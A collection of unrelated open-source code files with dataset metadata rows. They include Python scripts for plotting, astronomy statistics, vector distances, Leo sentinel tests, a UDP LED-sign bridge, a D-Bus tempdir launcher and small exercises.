    df[names].droplevel(axis=1, level=1).iloc[:,1:].rolling(100).mean().plot(legend=True, ylabel='Temperature (C)', xlabel='Time', grid='both', figsize=(16,10)).get_figure().savefig(f'{output_path}/{input_file}_TEMP.png',dpi=300, bbox_inches = "tight")
    return
if __name__ == '__main__':
    main()
| true |
279f357ff3d95b61d165bc80397ba9bd79f16620 | Python | KarolJanik-IS/pp1 | /04-Subroutines/zadanie24.py | UTF-8 | 251 | 3.5 | 4 | [] | no_license | #24
def miesiac(n):
    """Return the Polish name of month number n (1 = Styczeń ... 12 = Grudzień).

    Raises ValueError when n is outside 1..12.  Previously an out-of-range n
    silently returned the wrong month via Python's negative indexing.
    """
    nazwy = ['Styczeń', 'Luty', 'Marzec', 'Kwiecień', 'Maj', 'Czerwiec',
             'Lipiec', 'Sierpień', 'Wrzesień', 'Październik', 'Listopad',
             'Grudzień']  # fixed typo: was 'Grudień'
    if not 1 <= n <= 12:
        raise ValueError(f'miesiac(n): n must be in 1..12, got {n}')
    return nazwy[n - 1]
# Demo: show the Polish names of months 7 and 9.
print(f'Miesiąc 7 to {miesiac(7)}')
print(f'Miesiąc 9 to {miesiac(9)}')
dd5eac4e192adbd9d41d384f27fe193b7a5cccd4 | Python | bertrik/lichtkrant | /ledbanner2udp.py | UTF-8 | 1,588 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
"""
Bridge between the revspace ledbanner and a 80x7 scrolling led sign (red-green)
- accepts revspace ledbanner frames (80x8 pixels raw RGB) from stdin
- copies each frame to stdout
- converts each frame to 80x8 pixels rgb565 which is sent using UDP to a host on the network
"""
import sys
import argparse
import socket
def rgb888_to_rgb565(rgb):
r, g, b = rgb
rgb565 = ((r << 8) & 0xF800) | ((g << 3) & 0x07E0) | ((b >> 3) & 0x001F)
return rgb565.to_bytes(2, byteorder='big')
def convert_frame(data):
""" Converts the supplied rgb888 frame and returns a rgb565 frame """
num = len(data) // 3
out = bytearray(2 * num)
pi = po = 0
for i in range(0, num):
rgb888 = data[pi:pi+3]
pi += 3
out[po:po+2] = rgb888_to_rgb565(rgb888)
po += 2
return out
def main():
""" The main entry point """
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip", type=str, help="The UDP host ip", default="localhost")
parser.add_argument("-p", "--port", type=int, help="The UDP host port", default="1565")
args = parser.parse_args()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
# read ledbanner frame from stdin
data = sys.stdin.buffer.read(80*8*3)
if len(data) != 80*8*3:
break
# copy to stdout
sys.stdout.buffer.write(data)
# convert
frame = convert_frame(data)
# send over UDP
s.sendto(frame, (args.ip, args.port))
if __name__ == "__main__":
main()
| true |
61f35c0fd2ee1b8e036a5ac6ea9da89579db110d | Python | astroML/astroML_figures | /book_figures/chapter5/fig_posterior_cauchy.py | UTF-8 | 4,268 | 3.09375 | 3 | [
"BSD-2-Clause"
] | permissive | """
Posterior for Cauchy Distribution
---------------------------------
Figure 5.11
The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel)
and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the
two-dimensional pdf from figure 5.10. The dashed lines show the distribution
of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median
and interquartile range. The bottom panels show the corresponding cumulative
distributions.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import cauchy
from astroML.stats import median_sigmaG
from astroML.resample import bootstrap
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
if "setup_text_plots" not in globals():
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def cauchy_logL(x, gamma, mu):
    """Equation 5.74: log-likelihood of samples x under Cauchy(mu, gamma)."""
    x = np.asarray(x)
    n = x.size
    # Append one broadcast axis per dimension of the (gamma, mu) grid so
    # that the sample axis stays first and can be summed out.
    grid_shape = np.broadcast(gamma, mu).shape
    x = x.reshape(x.shape + (1,) * len(grid_shape))
    return (n - 1) * np.log(gamma) - np.sum(np.log(gamma ** 2 + (x - mu) ** 2), 0)
def estimate_mu_gamma(xi, axis=None):
    """Equation 3.54: Cauchy point estimates (median, half the IQR)."""
    quartiles = np.percentile(xi, [25, 50, 75], axis=axis)
    lower, median, upper = quartiles
    return median, 0.5 * (upper - lower)
#------------------------------------------------------------
# Draw a random sample from the cauchy distribution, and compute
# marginalized posteriors of mu and gamma
np.random.seed(44)
n = 10
mu_0 = 0
gamma_0 = 2
xi = cauchy(mu_0, gamma_0).rvs(n)
# Parameter grids; dgamma/dmu are the spacings used to normalise the
# marginal posteriors to unit area below.
gamma = np.linspace(0.01, 5, 70)
dgamma = gamma[1] - gamma[0]
mu = np.linspace(-3, 3, 70)
dmu = mu[1] - mu[0]
likelihood = np.exp(cauchy_logL(xi, gamma[:, np.newaxis], mu))
# Marginalise over one parameter at a time (sum over the grid axis).
pmu = likelihood.sum(0)
pmu /= pmu.sum() * dmu
pgamma = likelihood.sum(1)
pgamma /= pgamma.sum() * dgamma
#------------------------------------------------------------
# bootstrap estimate
mu_bins = np.linspace(-3, 3, 21)
gamma_bins = np.linspace(0, 5, 17)
mu_bootstrap, gamma_bootstrap = bootstrap(xi, 20000, estimate_mu_gamma,
                                          kwargs=dict(axis=1), random_state=0)
#------------------------------------------------------------
# Plot results
fig = plt.figure(figsize=(5, 5))
fig.subplots_adjust(wspace=0.35, right=0.95,
                    hspace=0.2, top=0.95)
# first axes: mu posterior
ax1 = fig.add_subplot(221)
ax1.plot(mu, pmu, '-k')
ax1.hist(mu_bootstrap, mu_bins, density=True,
         histtype='step', color='b', linestyle='dashed')
ax1.set_xlabel(r'$\mu$')
ax1.set_ylabel(r'$p(\mu|x,I)$')
# second axes: mu cumulative posterior
ax2 = fig.add_subplot(223, sharex=ax1)
ax2.plot(mu, pmu.cumsum() * dmu, '-k')
ax2.hist(mu_bootstrap, mu_bins, density=True, cumulative=True,
         histtype='step', color='b', linestyle='dashed')
ax2.set_xlabel(r'$\mu$')
ax2.set_ylabel(r'$P(<\mu|x,I)$')
ax2.set_xlim(-3, 3)
# third axes: gamma posterior
ax3 = fig.add_subplot(222, sharey=ax1)
ax3.plot(gamma, pgamma, '-k')
ax3.hist(gamma_bootstrap, gamma_bins, density=True,
         histtype='step', color='b', linestyle='dashed')
ax3.set_xlabel(r'$\gamma$')
ax3.set_ylabel(r'$p(\gamma|x,I)$')
ax3.set_ylim(-0.05, 1.1)
# fourth axes: gamma cumulative posterior
ax4 = fig.add_subplot(224, sharex=ax3, sharey=ax2)
ax4.plot(gamma, pgamma.cumsum() * dgamma, '-k')
ax4.hist(gamma_bootstrap, gamma_bins, density=True, cumulative=True,
         histtype='step', color='b', linestyle='dashed')
ax4.set_xlabel(r'$\gamma$')
ax4.set_ylabel(r'$P(<\gamma|x,I)$')
ax4.set_ylim(-0.05, 1.1)
ax4.set_xlim(0, 4)
plt.show()
| true |
831721662feacc5d0251aa694a43ecd3eeab7c31 | Python | connesy/ProjectEuler | /python/problem016/problem016.py | UTF-8 | 223 | 2.9375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
@author: Stefan Mejlgaard
"""
from python.utils.number_utils import digit_sum
if __name__ == "__main__":
result = digit_sum(2**15)
print(result)
result = digit_sum(2**1000)
print(result)
| true |
b1fd9dd8455f946e432a88b96ef6ff41e26b51ee | Python | dpsnewailab/DPS_Util | /dpsutil/vector/distance.py | UTF-8 | 1,849 | 3.109375 | 3 | [
"MIT"
] | permissive | import numpy
def normalize_L1(x):
    # NOTE(review): numpy.linalg.norm defaults to the 2-norm, so despite the
    # name this scales by the Euclidean (L2) norm -- confirm intent.
    return x / numpy.linalg.norm(x)
def normalize_L2(x):
    """Normalize each row of a 2-D array to unit Euclidean length."""
    assert isinstance(x, numpy.ndarray)
    row_norms = numpy.sqrt(numpy.sum(x ** 2, axis=1, keepdims=True))
    return x / row_norms
def cosine_similarity(x1, x2, skip_normalize=False):
    """Cosine similarity of two vectors, or the pairwise similarity matrix
    when both inputs are 2-D stacks of row vectors."""
    if type(x1) is list:
        x1 = numpy.array(x1)
    if type(x2) is list:
        x2 = numpy.array(x2)
    assert type(x1) is numpy.ndarray or type(x2) is numpy.ndarray
    assert x1.shape == x2.shape
    assert len(x1.shape) <= 2
    if not skip_normalize:
        # Matrices are normalized row by row; plain vectors as a whole.
        normalize = normalize_L2 if len(x1.shape) == 2 else normalize_L1
        x1, x2 = normalize(x1), normalize(x2)
    return numpy.dot(x1, x2.T)
def cosine(x1, x2, skip_normalize=False):
    """Cosine distance: 1 - cosine_similarity(x1, x2)."""
    return 1 - cosine_similarity(x1, x2, skip_normalize=skip_normalize)
def euclidean_distance(x1, x2):
    """Euclidean distance of two vectors, or the full pairwise distance
    matrix when both inputs are 2-D stacks of row vectors."""
    if type(x1) is list:
        x1 = numpy.array(x1)
    if type(x2) is list:
        x2 = numpy.array(x2)
    assert type(x1) is numpy.ndarray or type(x2) is numpy.ndarray
    assert x1.shape == x2.shape
    assert len(x1.shape) <= 2
    if len(x1.shape) == 1:
        delta = x1 - x2
        return numpy.sqrt(numpy.sum(delta ** 2))
    # Broadcast to an (n, n, dim) difference cube, reduce over the last axis.
    pairwise = x1[:, numpy.newaxis, :] - x2[numpy.newaxis, :, :]
    return numpy.sqrt(numpy.sum(pairwise ** 2, axis=-1))
def cosim2euclid(cosim):
    """
    Convert cosine similarity -> normalized euclidean distance
    :return:
    """
    # NOTE(review): inverse of euclid2cosim below (sqrt vs square).  The usual
    # unit-vector identity is d^2 = 2*(1 - cos) -- confirm the convention used.
    return numpy.sqrt(cosim)
def euclid2cosim(euclid_dis):
    """
    Convert normalized euclidean distance -> cosine similarity
    :return:
    """
    # Inverse of cosim2euclid: squares the distance back.
    return euclid_dis ** 2
def absolute_distance(x1, x2):
    """Sum of absolute element-wise differences (L1 / Manhattan distance)."""
    difference = numpy.absolute(x1 - x2)
    return numpy.sum(difference)
__all__ = ['normalize_L1', 'normalize_L2', 'cosine_similarity', 'cosine', 'euclidean_distance',
'cosim2euclid', 'euclid2cosim', 'absolute_distance']
| true |
ba2377fa2d46741681b09f88639a20d23b3929a2 | Python | leo-editor/leo-editor-contrib | /Projects/From Bernhard Mulder/MulderSentinelScript/test_sentinels.py | UTF-8 | 13,720 | 2.84375 | 3 | [] | no_license | #@+leo-ver=4
#@+node:@file test_sentinels.py
#@+others
#@+node:imports
import os
from unittest import TestCase, TestSuite, TextTestRunner
import sentinel
import shutil
#@-node:imports
#@+node:class sentinel_test
class sentinel_test(TestCase):
    """Shared fixture for the sentinel push/pull tests: writes an annotated
    input file and a sentinel.cfg mapping it to a derived output file.
    (Python 2 code: uses the file() builtin; #@ lines are Leo sentinels.)"""
    #@    @+others
    #@+node:setUp
    def setUp(self):
        # Standard Leo sentinel header/footer wrapped around each test body.
        self.prefix = ["#@+leo-ver=4\n",
                       "#@+node:@file sentinel.py\n",
                       "#@@language python\n"]
        self.postfix = ["#@-node:@file sentinel.py\n",
                        "#@-leo\n"]
    #@-node:setUp
    #@+node:setup_inputfile
    def setup_inputfile(self, input):
        # Write the given lines (note: `input` shadows the builtin) to a
        # per-test-class source file under test/.
        classname = self.__class__.__name__
        self.input_filename = os.path.join('test/s_%s.txt' % classname)
        self.output_filename = os.path.join('test/d_%s.txt' % classname)
        outfile = file(self.input_filename, "w")
        for line in input:
            outfile.write(line)
        outfile.close()
    #@-node:setup_inputfile
    #@+node:setup_configfile
    def setup_configfile(self):
        # Config consumed by sentinel.main: source s1 -> destination d1.
        self.configfilename = "test/sentinel.cfg"
        outfile = file(self.configfilename, "w")
        outfile.write("[sentinel]\n")
        outfile.write("\ns1=%s\n" % self.input_filename)
        outfile.write("\nd1=%s\n" % self.output_filename)
        outfile.close()
    #@-node:setup_configfile
    #@-others
#@nonl
#@-node:class sentinel_test
#@+node:class insert_test
class insert_test(sentinel_test):
    """Round trip: a line inserted into the sentinel-free output must survive
    pull (back into the annotated source) and a subsequent push."""
    #@    @+others
    #@+node:setUp
    def setUp(self):
        sentinel_test.setUp(self)
        self.setup_inputfile(self.prefix +
                             ["Proof of concept implementation of sentinel free LEO files.\n",
                              "We try to insert a line after here\n",
                              "This should be after the inserted line\n",
                              "This should be the last line in the file\n"]
                             + self.postfix)
        # here are the same lines, without sentinels
        self.lines = ["Proof of concept implementation of sentinel free LEO files.\n",
                      "We try to insert a line after here\n",
                      "This should be after the inserted line\n",
                      "This should be the last line in the file\n"]
        self.setup_configfile()
    #@-node:setUp
    #@+node:runTest
    def runTest(self):
        """
        Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
        """
        # First, produce the sentinel free output.
        sentinel.main(self.configfilename, "push")
        # Verify this first step.
        assert os.path.exists(self.output_filename)
        assert file(self.output_filename).readlines() == self.lines
        # then insert one line in the sentinel free output.
        lines = self.lines
        lines[2:2] = ["This is an inserted line\n"]
        outfile = file(self.output_filename, "w")
        for line in lines:
            outfile.write(line)
        outfile.close()
        # get the sources back.
        sentinel.main(self.configfilename, "pull")
        # re-generate the output.
        sentinel.main(self.configfilename, "push")
        # and check for equality.
        assert file(self.output_filename).readlines() == lines
    #@-node:runTest
    #@-others
#@nonl
#@-node:class insert_test
#@+node:class replace_test
class replace_test(sentinel_test):
    """
    Replace a single line.
    """
    #@    @+others
    #@+node:setUp
    def setUp(self):
        sentinel_test.setUp(self)
        self.lines = [
            "Proof of concept implementation of sentinel free LEO files.\n",
            "This line should be replaced\n",
            "This should be the last line in the file\n"]
        self.setup_inputfile(self.prefix + self.lines + self.postfix)
        # here are the same lines, without sentinels
        self.setup_configfile()
    #@-node:setUp
    #@+node:runTest
    def runTest(self):
        """
        Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
        """
        # First, produce the sentinel free output.
        sentinel.main(self.configfilename, "push")
        # Verify this first step.
        assert os.path.exists(self.output_filename)
        assert file(self.output_filename).readlines() == self.lines
        # then insert one line in the sentinel free output.
        lines = self.lines
        # NOTE(review): despite the class docstring, [2:2] *inserts* rather
        # than replaces line 2 -- confirm whether lines[2:3] was intended.
        lines[2:2] = ["This is a replaced line\n"]
        outfile = file(self.output_filename, "w")
        for line in lines:
            outfile.write(line)
        outfile.close()
        # get the sources back.
        sentinel.main(self.configfilename, "pull")
        # re-generate the output.
        sentinel.main(self.configfilename, "push")
        # and check for equality.
        assert file(self.output_filename).readlines() == lines
    #@-node:runTest
    #@-others
#@nonl
#@-node:class replace_test
#@+node:class replace_test2
class replace_test2(sentinel_test):
    """
    Replace two lines.
    """
    #@    @+others
    #@+node:setUp
    def setUp(self):
        sentinel_test.setUp(self)
        self.lines = [
            "Line 0\n", #0
            " Line 1\n", #1
            " Line 2.\n", #2
            " Line 3.\n", #3
            " Line 4\n", #4
            "\n", #5
            " We have two subclasses:\n", #6
            " single_clss represents a (condition, register) => (expression_number, linenumber) mapping.\n", #7
            " set_class represents a set of (condition, register) => (expression_number, linenumber) mapping.\n", #8
            "\n", #9
            " Line 10\n", #10
            " Line 11\n" #11
            ]
        self.setup_inputfile(self.prefix + self.lines + self.postfix)
        # here are the same lines, without sentinels
        self.setup_configfile()
    #@-node:setUp
    #@+node:runTest
    def runTest(self):
        """
        Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
        """
        # First, produce the sentinel free output.
        sentinel.main(self.configfilename, "push")
        # Verify this first step.
        assert os.path.exists(self.output_filename)
        assert file(self.output_filename).readlines() == self.lines
        # then insert two lines in the sentinel free output.
        # (This slice assignment genuinely replaces items 7 and 8.)
        lines = self.lines
        lines[7:9] = [" single_class represents a (condition, register) => (expression_number, linenumber) mapping.\n", #7
                      " set_class represents a set of (condition, register) => (expression_number, linenumber) mappings.\n", #8
                      ]
        outfile = file(self.output_filename, "w")
        for line in lines:
            outfile.write(line)
        outfile.close()
        # get the sources back.
        sentinel.main(self.configfilename, "pull")
        # re-generate the output.
        sentinel.main(self.configfilename, "push")
        # and check for equality.
        assert file(self.output_filename).readlines() == lines
    #@-node:runTest
    #@-others
#@nonl
#@-node:class replace_test2
#@+node:class replace_test3
class replace_test3(sentinel_test):
    """
    Replace the lines of a whole node.
    """
    #@    @+others
    #@+node:setUp
    def setUp(self):
        sentinel_test.setUp(self)
        # The input contains Leo sentinel lines *inside* the body, so the
        # replacement below crosses a sentinel block boundary.
        self.lines = [
            "#@+node:main\n",
            "node 1: line 1\n", # 1
            "node 1: line 2\n", # 2
            "#@-node:main\n",
            "#@-others\n",
            "node 2: line 3\n", # 3
            "node 2: line 4\n", # 4
            "#@-node:@file sentinel.py\n",
            ]
        self.setup_inputfile(self.prefix + self.lines + self.postfix)
        # here are the same lines, without sentinels
        self.setup_configfile()
    #@-node:setUp
    #@+node:runTest
    def runTest(self):
        """
        Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
        """
        # First, produce the sentinel free output.
        sentinel.main(self.configfilename, "push")
        # Verify this first step.
        assert os.path.exists(self.output_filename)
        filtered_lines = sentinel.push_filter_lines(self.lines)[0]
        assert file(self.output_filename).readlines() == filtered_lines
        # then insert one line in the sentinel free output.
        filtered_lines [2:4] = [ "These lines should be totally different\n",
                                 "and be replaced across sentinel blocks,\n",
                                 ]
        outfile = file(self.output_filename, "w")
        for line in filtered_lines:
            outfile.write(line)
        outfile.close()
        # get the sources back.
        sentinel.main(self.configfilename, "pull")
        # re-generate the output.
        sentinel.main(self.configfilename, "push")
        # and check for equality.
        assert file(self.output_filename).readlines() == filtered_lines
    #@-node:runTest
    #@-others
#@nonl
#@-node:class replace_test3
#@+node:class replace_test4
class replace_test4(sentinel_test):
    """
    Replace the lines of a whole node.
    """
    #@    @+others
    #@+node:setUp
    def setUp(self):
        sentinel_test.setUp(self)
        # Same fixture as replace_test3; only the replaced slice differs.
        self.lines = [
            "#@+node:main\n",
            "node 1: line 1\n", # 1
            "node 1: line 2\n", # 2
            "#@-node:main\n",
            "#@-others\n",
            "node 2: line 3\n", # 3
            "node 2: line 4\n", # 4
            "#@-node:@file sentinel.py\n",
            ]
        self.setup_inputfile(self.prefix + self.lines + self.postfix)
        # here are the same lines, without sentinels
        self.setup_configfile()
    #@-node:setUp
    #@+node:runTest
    def runTest(self):
        """
        Insert a line in a file without sentinels of a file derived of a file with sentinels, and make sure that this line is inserted in the proper place.
        """
        # First, produce the sentinel free output.
        sentinel.main(self.configfilename, "push")
        # Verify this first step.
        assert os.path.exists(self.output_filename)
        filtered_lines = sentinel.push_filter_lines(self.lines)[0]
        assert file(self.output_filename).readlines() == filtered_lines
        # then insert one line in the sentinel free output.
        filtered_lines [1:3] = [ "These lines should be totally different\n",
                                 "and be replaced across sentinel blocks,\n",
                                 ]
        outfile = file(self.output_filename, "w")
        for line in filtered_lines:
            outfile.write(line)
        outfile.close()
        # get the sources back.
        sentinel.main(self.configfilename, "pull")
        # re-generate the output.
        sentinel.main(self.configfilename, "push")
        # and check for equality.
        assert file(self.output_filename).readlines() == filtered_lines
    #@-node:runTest
    #@-others
#@nonl
#@-node:class replace_test4
#@+node:regression tests
#@+doc
# these are tests representing errors which I encountered during the
# development of the code.
#@-doc
#@nonl
#@-node:regression tests
#@+node:class regression_test_1
class regression_test_1(sentinel_test):
    """
    Regression: a push followed by a pull must leave the annotated
    source file completely unchanged.
    """
    #@    @+others
    #@+node:setUp
    def setUp(self):
        # Full annotated input (prefix/postfix included), so the base
        # class setUp is intentionally not called here.
        self.lines = [
            "#@+leo-ver=4\n",
            "#@+node:@file driver.py\n",
            "#@@language python\n",
            "#@+others\n",
            "#@+node:imports\n",
            "# Analyse an IA64 assembly file:\n",
            "# 1. Identify basic blocks.\n",
            "# 2. Track the contents of registers symbolically.\n",
            "import os, sys, cmp_globals\n",
            "\n",
            "#@-node:imports\n",
            "#@+node:process_file\n",
            "def process_file(infile, pyname_full, configfile, firststep, laststep):\n",
            "    \n",
            "    proc()\n",
            "#@nonl\n",
            "#@-node:process_file\n",
            "#@-others\n",
            "#@-node:@file driver.py\n",
            "#@-leo\n"
            ]
        self.setup_inputfile(self.lines)
        # here are the same lines, without sentinels
        self.setup_configfile()
    #@-node:setUp
    #@+node:runTest
    def runTest(self):
        """
        Push then pull with no edits in between; the annotated source must
        come back byte-for-byte identical.
        """
        # First, produce the sentinel free output.
        sentinel.main(self.configfilename, "push")
        # Verify this first step.
        assert os.path.exists(self.output_filename)
        assert file(self.output_filename).readlines() == sentinel.push_filter_lines(self.lines)[0]
        # get the sources back.
        sentinel.main(self.configfilename, "pull")
        # Now check that the source has not been changed.
        assert file(self.input_filename).readlines() == self.lines
    #@-node:runTest
    #@-others
#@nonl
#@-node:class regression_test_1
#@+node:main
if __name__ == '__main__':
    # Config-file driven test selection was disabled in favour of the
    # hard-coded 'all' below.
    #fileName = os.path.join(os.getcwd(),"testing.ini")
    #config = ConfigParser.ConfigParser()
    #config.read(fileName)
    #main = "Main"
    #leodir = config.get(main, "leodir")
    #test_to_run = config.get(main, "test_to_run")
    test_to_run = 'all'
    # Start from a clean scratch directory for the generated files.
    if os.path.exists("test"):
        shutil.rmtree("test")
    os.mkdir("test")
    suite = TestSuite()
    if test_to_run == 'all':
        # NOTE(review): replace_test4 is defined above but not listed here --
        # confirm whether its omission from the suite is intentional.
        for testclass in (
            insert_test,
            replace_test,
            replace_test2,
            replace_test3,
            regression_test_1,
            ):
            suite.addTest(testclass())
    else:
        suite.addTest(globals()[test_to_run]())
    testrunner = TextTestRunner()
    testrunner.run(suite)
#@nonl
#@-node:main
#@-others
#@nonl
#@-node:@file test_sentinels.py
#@-leo
| true |
e2610b99af5b03f762a7d99e5c11366933dcc7b8 | Python | TheRealMolen/ucorruption | /cpu.py | UTF-8 | 266 | 2.625 | 3 | [] | no_license |
asm1 = '12c334401111'
asm2 = '0410'
addr = 0x4400
for i in range(0,len(asm1),4):
print 'let %04x=%s%s; ' % (addr, asm1[i+2:i+4], asm1[i:i+2]),
addr += 2
for i in range(9):
print 'let %04x=%s%s; ' % (addr, asm2[2:], asm2[:2]),
addr += 2
print ''
| true |
817ebb497633f653b77a27579eef6a00b8b53010 | Python | YiZeng623/Advanced-Gradient-Obfuscating | /utils.py | UTF-8 | 2,836 | 2.578125 | 3 | [
"MIT"
] | permissive | import PIL.Image
from imagenet_labels import label_to_name
import matplotlib.pyplot as plt
from defense import *
# Some of the code refering to Anish & Carlini's github: https://github.com/anishathalye/obfuscated-gradients
def getabatch(dataset,labelset,numbatch,batchsize):
databatch = dataset[numbatch*batchsize:(numbatch*batchsize+batchsize)]
labelbatch = labelset[numbatch*batchsize:(numbatch*batchsize+batchsize)]
return databatch,labelbatch
def linf_distortion(img1, img2):
if len(img1.shape) == 4:
n = img1.shape[0]
l = np.mean(np.max(np.abs(img1.reshape((n, -1)) - img2.reshape((n, -1))), axis=1), axis=0)
else:
l = np.max(np.abs(img1 - img2))
return l
def l2_distortion(img1, img2):
if len(img1.shape) == 4:
n = img1.shape[0]
l = np.mean(np.sqrt(np.sum((img1.reshape((n, -1)) - img2.reshape((n, -1)))
** 2, axis=1) / np.product(img1.shape[1:])), axis=0)
else:
l = np.sqrt(np.sum((img1 - img2) ** 2) / np.product(img1.shape))
return l
def one_hot(index, total):
arr = np.zeros((total))
arr[index] = 1.0
return arr
def optimistic_restore(session, save_file):
reader = tf.train.NewCheckpointReader(save_file)
saved_shapes = reader.get_variable_to_shape_map()
var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
if var.name.split(':')[0] in saved_shapes])
restore_vars = []
with tf.variable_scope('', reuse=True):
for var_name, saved_var_name in var_names:
curr_var = tf.get_variable(saved_var_name)
var_shape = curr_var.get_shape().as_list()
if var_shape == saved_shapes[saved_var_name]:
restore_vars.append(curr_var)
saver = tf.train.Saver(restore_vars)
saver.restore(session, save_file)
def load_image(path):
return (np.asarray(PIL.Image.open(path).resize((299, 299)))/255.0).astype(np.float32)
def make_classify(sess, input_, probs):
def classify(img, correct_class=None, target_class=None):
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))
fig.sca(ax1)
p = sess.run(probs, feed_dict={input_: img})[0]
ax1.imshow(img)
fig.sca(ax1)
topk = list(p.argsort()[-10:][::-1])
topprobs = p[topk]
barlist = ax2.bar(range(10), topprobs)
if target_class in topk:
barlist[topk.index(target_class)].set_color('r')
if correct_class in topk:
barlist[topk.index(correct_class)].set_color('g')
plt.sca(ax2)
plt.ylim([0, 1.1])
plt.xticks(range(10),
[label_to_name(i)[:15] for i in topk],
rotation='vertical')
fig.subplots_adjust(bottom=0.2)
plt.show()
return classify
| true |
0f86450b9bb57ea661d2b89dc73b1814019e5c05 | Python | fishface60/tempdird | /with-tempdir | UTF-8 | 3,158 | 2.53125 | 3 | [
"ISC"
] | permissive | #!/usr/bin/python
#Copyright (c) 2015, Richard Maw <richard.maw@gmail.com>
#
#Permission to use, copy, modify, and/or distribute this software for any
#purpose with or without fee is hereby granted, provided that the above
#copyright notice and this permission notice appear in all copies.
#
#THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
#WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
#MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
#ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
#WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
#ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
#OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''Run a subprocess with a tempdir
Requests a tempdir from a 'name.maw.richard.tempd0' service, by talking to
a D-Bus service specified by --bus-name and --bus-object-path, and starts
a subprocess with the directory file descriptor still open on a file
descriptor referred to by the environment variable specified by --fd-env-var,
or replaces arguments equal to --fd-template.
'''
__version__ = (0, 0)
import argparse
import os
import subprocess
import sys
import dbus
# Command-line interface; --help text mirrors the module docstring above.
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--version', action='version',
                    version='%(prog)s ' + '.'.join(map(str, __version__)))
parser.add_argument('--bus-name', default='name.maw.richard.tempd0',
                    help='Bus peer address to request tempdir from')
parser.add_argument('--bus-object-path', default='/name/maw/richard/tempd',
                    help='Object path of service in Bus peer')
parser.add_argument('--dir-prefix', default=None, type=str,
                    help='Prefix to name of tempdir to create')
parser.add_argument('--dir-suffix', default=None, type=str,
                    help='Suffix to name of tempdir to create')
parser.add_argument('--fd-env-var', default='TEMPDIR_FD',
                    help='Environment variable to store tempdir fd number in')
parser.add_argument('--fd-template', default=None, type=str,
                    help='Replace args equal to this with tempdir fd number')
parser.add_argument('argv', nargs='+',
                    help='Command to run with tempdir')
options = parser.parse_args()
# Ask the tempdir service (over the session bus) for a fresh directory.
bus = dbus.SessionBus()
temp_manager = bus.get_object(options.bus_name,
                              options.bus_object_path)
tempd = dbus.Interface(temp_manager,
                       dbus_interface='name.maw.richard.tempd0')
# make_tempdir returns two file descriptors: the directory itself and the
# write end of a FIFO -- presumably the service removes the directory once
# this write end is closed; confirm against the tempd service.
temp_dir, fifo_write = tempd.make_tempdir(options.dir_suffix or "",
                                          options.dir_prefix or "")
# .take() extracts the raw fd numbers from the dbus UnixFd wrappers,
# transferring ownership to this process.
temp_dir_fd, fifo_write_fd = temp_dir.take(), fifo_write.take()
env = dict(os.environ)
if options.fd_env_var:
    env[options.fd_env_var] = str(temp_dir_fd)
# Either pass the fd purely via the environment, or additionally substitute
# it for any argv entry equal to --fd-template.
if options.fd_template is None:
    argv = options.argv
else:
    argv = [str(temp_dir_fd) if arg == options.fd_template else arg
            for arg in options.argv]
# The child closes the FIFO write end before exec so that only this parent
# process keeps it open; exit with the child's return code.
sys.exit(subprocess.call(argv, env=env,
                         preexec_fn=lambda: os.close(fifo_write_fd)))
d6cf90ea05b97dbd140f33e5aed4df41728e4a4a | Python | priyapsakthivel/hello_python | /python_learn/Odd_even.py | UTF-8 | 284 | 4 | 4 | [] | no_license | number1=int(input("please enter an number"))
# Parity checker: reports odd/even for two user-supplied integers
# (number1 is read from stdin just above this block).
number2=int(input("please enter a second number"))
# Parity of the first number.
if (number1%2==0):
    print("its an even number")
else:
    print("the given number is odd")
# Same check repeated for the second number.
if (number2%2==0):
    print("its an even number")
else:
    print("the given number is odd")
d273646d9ed18244bb92c4dafb8315dc2a25fe93 | Python | charluz/cyPython | /image_shading/cyPyModules/image_shading.py | UTF-8 | 23,828 | 3.109375 | 3 | [] | no_license | #!/usr/bin/python
import os, sys
import numpy as np
import cv2
if __name__ == "__main__":
import image_ROI as ROI
else:
import cyPyModules.image_ROI as ROI
#--------------------------------------
# Class: ImageShading
#--------------------------------------
class ImageShading():
    """Luma/chroma shading inspection over a fixed set of image rectangles.

    Nine rectangles are tracked, keyed by a short name:
      * Co      : the center rectangle
      * Q1..Q4  : the diagonal rectangles, Q1 being the 1st quadrant
      * Hr / Hl : the horizontal rectangles (right / left of center)
      * Vt / Vb : the vertical rectangles (top / bottom of center)

    For every rectangle the mean gray level (Y) and mean B/G/R channel
    values are measured from the source image; show() then compares each
    edge rectangle against the center one and draws it green (pass) or
    red (fail).

    Attributes
    --------------
